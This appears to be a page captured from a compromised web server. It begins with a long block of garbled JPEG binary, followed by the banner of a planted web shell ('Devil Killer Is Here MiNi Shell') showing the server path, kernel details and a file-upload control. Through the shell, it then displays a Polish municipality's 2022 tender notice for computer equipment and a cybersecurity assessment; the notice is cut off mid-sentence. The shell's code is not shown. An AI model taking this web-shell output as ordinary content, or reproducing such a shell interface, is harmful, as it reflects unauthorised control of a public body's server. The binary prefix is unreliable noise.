JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20220805/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20220805/0029356901-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> &#34;Dostawa urządzeń i oprogramowania wraz z przeprowadzeniem diagnozy cyberbezpieczeństwa w ramach konkursu grantowego &#34;Cyfrowa Gmina&#34; realizowanego przez Gminę Sędziejowice&#34; </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">GMINA SĘDZIEJOWICE</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 730934594</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Wieluńska 6</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Sędziejowice</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">98-160</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">łódzkie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL714 - Sieradzki</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">436771693</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zamowienia@gminasedziejowice.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">http://gminasedziejowice.eu/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> &#34;Dostawa urządzeń i oprogramowania wraz z przeprowadzeniem diagnozy cyberbezpieczeństwa w ramach konkursu grantowego &#34;Cyfrowa Gmina&#34; realizowanego przez Gminę Sędziejowice&#34; </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-f189de39-148a-11ed-acbd-46d0480cd9c4</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00293569</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-08-05</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2022/BZP 00025615/07/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.2.3 Dostawa urządzeń i oprogramowania wraz z przeprowadzeniem diagnozy cyberbezpieczeństwa w ramach Konkursu Grantowego &#34;Cyfrowa Gmina&#34; realizowanego przez Gminę Sędziejowice</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.15.) Nazwa projektu lub programu</h3> <p class="mb-0"> Program Operacyjny Polska Cyfrowa na lata 2014-2020 Oś Priorytetowa V Rozwój cyfrowy JST oraz wzmocnienie cyfrowej odporności na zagrożenia REACT-EU działania 5.1 Rozwój cyfrowy JST oraz wzmocnienie cyfrowej odporności na zagrożenia, dotyczący realizacji projektu grantowego „Cyfrowa Gmina” dla Gminy Sędziejowice </p> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/pn/gmina_sedziejowice <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">W niniejszym postępowaniu komunikacja między Zamawiającym, a Wykonawcami w<br/>szczególności składanie oświadczeń, wniosków, zawiadomień , ofert, wyjaśnień oraz przekazywanie informacji odbywa się<br/>elektronicznie za pośrednictwem platformy zakupowej Gminy Sędziejowice pod adresem:<br/>https://platformazakupowa.pl/pn/gmina_sedziejowice<br/>W przypadku niedziałania platformy kontakt (z wyjątkiem złożenia oferty) możliwy będzie za pomocą poczty e-mail na adres :<br/>zamowienia@gminasedziejowice.pl.</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. Wykonawca zobowiązany jest do<br/>sporządzenia oferty, dokumentów i oświadczeń zgodnie z Rozporządzeniem Prezesa Rady Ministrów z dnia 30.12.2020r. w sprawie<br/>sporządzenia i przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji<br/>elektronicznej w postępowaniu o udzieleniu zamówienia i konkursie.<br/>2.Zamawiający, zgodnie z Rozporządzeniem Prezesa Rady Ministrów z dnia 30 grudnia 2020r. w sprawie sposobu sporządzania i<br/>przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w<br/>postępowaniu o udzielenie zamówienia publicznego lub konkursie (Dz. U. z 2020r. poz. 2452), określa niezbędne wymagania<br/>sprzętowo - aplikacyjne umożliwiające pracę na platformazakupowa.pl, tj.:<br/>a. stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż 512 kb/s,<br/>b. komputer klasy PC lub MAC o następującej konfiguracji: pamięć min. 2 GB Ram, procesor Intel IV 2 GHZ lub jego nowsza wersja,<br/>jeden z systemów operacyjnych - MS Windows 7, Mac Os x 10 4, Linux, lub ich nowsze wersje,<br/>c. zainstalowana dowolna, inna niż Internet Explorer, przeglądarka internetowa,<br/>d. włączona obsługa JavaScript,<br/>e. zainstalowany program Adobe Acrobat Reader lub inny obsługujący format plików .pdf,<br/>f. Szyfrowanie na platformazakupowa.pl odbywa się za pomocą protokołu TLS 1.3,<br/>g. Oznaczenie czasu odbioru danych przez platformę zakupową stanowi datę oraz dokładny czas (hh:mm:ss) generowany wg. czasu<br/>lokalnego serwera synchronizowanego z zegarem Głównego Urzędu Miar.<br/>3. Formaty plików wykorzystywanych przez Wykonawców powinny być zgodne z “OBWIESZCZENIEM PREZESA RADY<br/>MINISTRÓW z dnia 9 listopada 2017 r. w sprawie ogłoszenia jednolitego tekstu rozporządzenia Rady Ministrów w sprawie<br/>Krajowych Ram Interoperacyjności, minimalnych wymagań dla rejestrów publicznych i wymiany informacji w postaci elektronicznej<br/>oraz minimalnych wymagań dla systemów teleinformatycznych”.<br/>4. Zamawiający rekomenduje wykorzystanie formatów: .pdf .doc .xls .jpg (.jpeg) ze szczególnym wskazaniem na .pdf<br/>5. W celu ewentualnej kompresji danych Zamawiający rekomenduje wykorzystanie jednego z formatów:<br/>a. .zip<br/>b. .7Z<br/>6. Wśród formatów powszechnych a NIE występujących w rozporządzeniu występują: .rar .gif .bmp .numbers .pages. Dokumenty<br/>złożone w takich plikach zostaną uznane za złożone nieskutecznie.<br/>7. Zamawiający zwraca uwagę na ograniczenia wielkości plików podpisywanych profilem zaufanym, który wynosi maks. 10 MB, oraz<br/>na ograniczenie wielkości plików podpisywanych w aplikacji eDoApp służącej do składania podpisu osobistego, który wynosi max<br/>5MB.<br/>8. Zalecenia Zamawiającego odnośnie kwalifikowanego podpisu elektronicznego:<br/>a. dla dokumentów w formacie „pdf” zaleca się podpis formatem PadES,<br/>b. dokumenty w formacie innym niż „pdf” zaleca się podpisywać formatem XadES, Wykonawca powinien pamiętać, aby plik z<br/>podpisem przekazywać łącznie z dokumentem podpisywanym.<br/>c. do składania podpisu zaleca się stosowanie algorytmu SHA-2 (lub wyższy).<br/>9. Ze względu na niskie ryzyko naruszenia integralności pliku oraz łatwiejszą weryfikację podpisu, Zamawiający zaleca, w miarę<br/>możliwości, przekonwertowanie plików składających się na ofertę na format .pdf i opatrzenie ich podpisem kwalifikowanym PAdES.<br/>10. Jeśli wykonawca pakuje dokumenty np. w plik ZIP zalecamy wcześniejsze podpisanie każdego ze skompresowanych plików.<br/>11. Zamawiający rekomenduje wykorzystanie podpisu z kwalifikowanym znacznikiem czasu.<br/>12. Zamawiający zaleca, aby nie wprowadzać jakichkolwiek zmian w plikach po podpisaniu ich. Może to skutkować brakiem<br/>integralności plików.<br/>13. Zamawiający zaleca, aby w przypadku podpisywania pliku przez kilka osób, stosować podpisy tego samego rodzaju.<br/>Podpisywanie różnymi rodzajami podpisów np. osobistym i kwalifikowanym może doprowadzić do problemów w weryfikacji plików.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zamawiający jako podmiot zobowiązany do realizacji obowiązku informacyjnego, o którym<br/>mowa w art. 13 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób<br/>fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia<br/>dyrektywy 95/46/WE (dalej zwane RODO) będą administratorem danych informuje:<br/>1. Administratorem danych osobowych dla osób fizycznych, od których bezpośrednio je pozyskano jest Zamawiający: Gmina<br/>Sędziejowice ul. Wieluńska 6, 98-160 Sędziejowice<br/>2. Administrator wyznaczył Inspektora Ochrony Danych, z którym można skontaktować się pod adresem e-mail:<br/>iod@gminasedziejowice.pl.<br/>3. Dane będą przetwarzane przez Zamawiającego w celu związanym z realizacją postępowania o udzielenie zamówienia<br/>publicznego. Podanie danych i ich zakres wynika bezpośrednio z ustawy Pzp oraz innych ustaw mających zastosowanie w<br/>niniejszym postępowaniu i stanowi obowiązek ustawowy (tj. art. 6 ust.1c RODO).<br/>4. Państwa dane zostaną udostępnione podmiotom i osobom, którym zostanie udostępniona dokumentacja przetargowa w oparciu o<br/>ustawę Pzp i inne przepisy prawa. Kategoria odbiorców: pracownicy Zamawiającego, osoby kontrolujące, Wykonawcy, osoby, o<br/>których mowa w art. 18 i 19 oraz 74 ustawy Pzp.<br/>5. Przysługuje Państwu prawo dostępu do Państwa danych osobowych, prawo żądania sprostowania i uzupełnienia niekompletnych<br/>danych, prawo żądania ograniczenia przetwarzania Państwa danych. W celu skorzystania z przysługujących praw, stosowne<br/>żądanie zgłosić należy na dane kontaktowe z pkt 1.<br/>6. W odniesieniu do Państwa danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany.<br/>7. Przysługuje Państwu również prawo wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych w przypadku<br/>nieprawidłowości w przetwarzaniu Państwa danych.<br/>8. Państwa dane przechowywane będą przez okres 4 lat od zakończenia postępowania.<br/>9. Podanie danych jest obowiązkiem ustawowym, wynikającym bezpośrednio z ustawy z dnia 11 września 2019r. Prawo zamówień<br/>publicznych.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">RW.VI.271.13.2022</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest dostawa stacji roboczych AIO typ 1 i 2, mobilnych stacji roboczych typy 1-5, monitorów typu I<br/>i II, skanerów, routera głównego i podległego, urządzenia wielofunkcyjnego, przełącznika, macierzy typu NAS,<br/>oprogramowania biurowego, oprogramowanie zdalnego dostępu, oprogramowania do monitorowania sieci, rozwiązania<br/>UTM. Szczegółowy opis przedmiotu zamówienia w zakresie części 1 zawiera załącznik nr 1a do SWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">30214000-2 - Stacje robocze</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">38520000-6 - Skanery</p> <p class="mb-0">31214100-0 - Przełączniki</p> <p class="mb-0">30231300-0 - Monitory ekranowe</p> <p class="mb-0">30121430-6 - Cyfrowe urządzenia powielające</p> <p class="mb-0">32413100-2 - Rutery sieciowe</p> <p class="mb-0">48000000-8 - Pakiety oprogramowania i systemy informatyczne</p> <p class="mb-0">30233141-1 - Nadmiarowa macierz niezależnych dysków (RAID)</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">14 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Kryterium cena brutto ( C) 60 %<br/>Kryterium gwarancja (T) 40%<br/>Waga punktowa spełnienia kryterium ceny brutto – maksymalnie 60 pkt.<br/>- najniższa cena brutto realizacji przedmiotu zamówienia wskazana w ofercie otrzyma – 60 pkt.<br/>- pozostałe oferty ilość uzyskanych pkt obliczona zostanie na podstawie wzoru<br/>P= Cn/Co* W<br/>P- liczba pkt<br/>Cn - najniższa cena realizacji postępowania<br/>Co - Cena oferenta<br/>*symbol mnożenia<br/>W- waga kryterium<br/>Kryterium gwarancji – w treści oferty należy wskazać okres gwarancji na dostawę mobilnych stacji roboczych typu 1-5 objętych I<br/>częścią przedmiotu zamówienia. W treści opisu przedmiotu zamówienia Zamawiający wskazał minimalny okres gwarancji który<br/>wynosi 24 miesiące. Maksymalny okres gwarancji jaki może zostać wskazany przez Wykonawcę w treści oferty to 48 miesięcy . W<br/>przypadku wskazania minimalnego okresu gwarancji Wykonawca otrzyma 0 pkt Okres gwarancji należy podać w miesiącach.<br/>Maksymalna ilość pkt w kryterium do uzyskania to 40 pkt. Wykonawcy, którzy wskażą okres gwarancji powyżej minimalnego okresu<br/>otrzymują punkty według wzoru:<br/>L= O/M*W<br/>L- liczba pkt w kryterium<br/>O- okres gwarancji w miesiącach w ocenianej ofercie<br/>M- maksymalny okres gwarancji (48 miesięcy)<br/>W- waga kryterium 40 pkt<br/>* symbol mnożenia</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Gwarancja</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 1</p> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 6</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy nie podlegają wykluczeniu na zasadach określonych w pkt<br/>VIII SWZ oraz spełniają warunki udziału w postępowaniu określone poniżej.<br/>2. O udzielenie zamówienia mogą ubiegać się Wykonawcy spełniający następujące warunki:<br/>a) zdolność do występowania w obrocie gospodarczym: Zamawiający nie stawia warunku w tym zakresie;<br/>b) uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów:<br/>Zamawiający nie stawia warunku w tym zakresie;<br/>c) sytuacji ekonomicznej i finansowej: Zamawiający nie stawia warunku w tym zakresie;<br/>d) zdolności technicznej i zawodowej:<br/>- Zamawiający wymaga, aby Wykonawca wykazał, że w okresie ostatnich trzech lat przed upływem terminu składania ofert,<br/>a jeżeli okres prowadzenia działalności jest krótszy, w tym okresie wykonał należycie:<br/>-Część I – dostawę stacji roboczych (w tym mobilnych, AIO) o wartości minimum 30 000 zł brutto; <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">a) Oświadczenie<br/>wykonawcy, w zakresie art. 108 ust. 1 pkt 5 Pzp, o braku przynależności do tej samej grupy kapitałowej, w rozumieniu ustawy z dnia<br/>16.02.2007 r. o ochronie konkurencji i konsumentów, z innym wykonawcą, który złożył odrębną ofertę, ofertę częściową albo<br/>oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi<br/>przygotowanie oferty, oferty częściowej niezależnie od innego Wykonawcy należącego do tej samej grupy kapitałowej - załącznik nr<br/>4 do SWZ.<br/>b) Odpis lub informacja z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji Działalności Gospodarczej, w<br/>zakresie art. 109 ust. 1 pkt 4 Pzp, sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy<br/>wymagają wpisu do rejestru lub ewidencji.<br/>c) Oświadczenie wykonawcy o aktualności informacji zawartych w oświadczeniu, o którym mowa w art. 125 ust. 1 Pzp. w zakresie<br/>odnoszącym się do podstaw wykluczenia wskazanych w art. 108 ust. 1 pkt. 3-6 oraz w zakresie podstaw wykluczenia wskazanych w<br/>art. 109 ust. 1 pkt 1 i 5 – 8 ustawy Pzp. - wzór oświadczenia stanowi Załącznik nr 6 do SWZ.<br/>d) Informacja z Krajowego Rejestru Karnego w zakresie dotyczącym podstaw wykluczenia wskazanych w art. 108 ust. 1 pkt 1, 2 i 4<br/>ustawy Pzp sporządzona nie wcześniej niż 6 miesięcy przed jej złożeniem.<br/>e) Zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzającego, że Wykonawca nie zalega z opłacaniem podatków i<br/>opłat, w zakresie art. 109 ust. 1 pkt 1 ustawy, wystawionego nie wcześniej niż 3 miesiące przed jego złożeniem, a w przypadku<br/>zalegania z opłacaniem podatków lub opłat wraz z zaświadczeniem Zamawiający żąda złożenia dokumentów potwierdzających, że<br/>odpowiednio przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu albo przed upływem terminu<br/>składania ofert Wykonawca dokonał płatności należnych podatków lub opłat wraz z odsetkami lub grzywnami lub zawarł wiążące<br/>porozumienie w sprawie spłat tych należności.<br/>f) Zaświadczenie albo inny dokument właściwej terenowej jednostki organizacyjnej Zakładu Ubezpieczeń Społecznych lub<br/>właściwego oddziału regionalnego lub właściwej placówki terenowej Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające,<br/>że Wykonawca nie zalega z opłacaniem składek na ubezpieczenia społeczne i zdrowotne w zakresie art. 109 ust. 1 pkt 1 ustawy<br/>Pzp. , wystawionego nie wcześniej niż 3 miesiące przed jego złożeniem, a w przypadku zalegania z opłaceniem składek na<br/>ubezpieczenia społeczne lub zdrowotne wraz z zaświadczeniem albo innym dokumentem zamawiający żąda złożenia dokumentów<br/>potwierdzających, że odpowiednio przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu albo<br/>przed upływem terminu składania ofert wykonawca dokonał płatności należnych składek na ubezpieczenia społeczne lub zdrowotne<br/>wraz z odsetkami lub grzywnami lub zawarł wiążące porozumienie w sprawie spłat tych należności.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Wykaz<br/>wykonanych dostaw i usług nie wcześniej niż w okresie ostatnich 3 lat, a jeżeli okres prowadzenia działalności jest krótszy - w tym<br/>okresie, wraz z podaniem ich rodzaju, ilości, daty i miejsca wykonania oraz podmiotów, na rzecz których te zostały wykonane, oraz<br/>załączeniem dowodów określających, czy te dostawy lub usługi zostały wykonane lub są wykonywane należycie, przy czym<br/>dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego dostawy lub usługi<br/>zostały wykonane, a w przypadku świadczeń powtarzających się lub ciągłych są wykonywane, a jeżeli wykonawca z przyczyn<br/>niezależnych od niego nie jest w stanie uzyskać tych 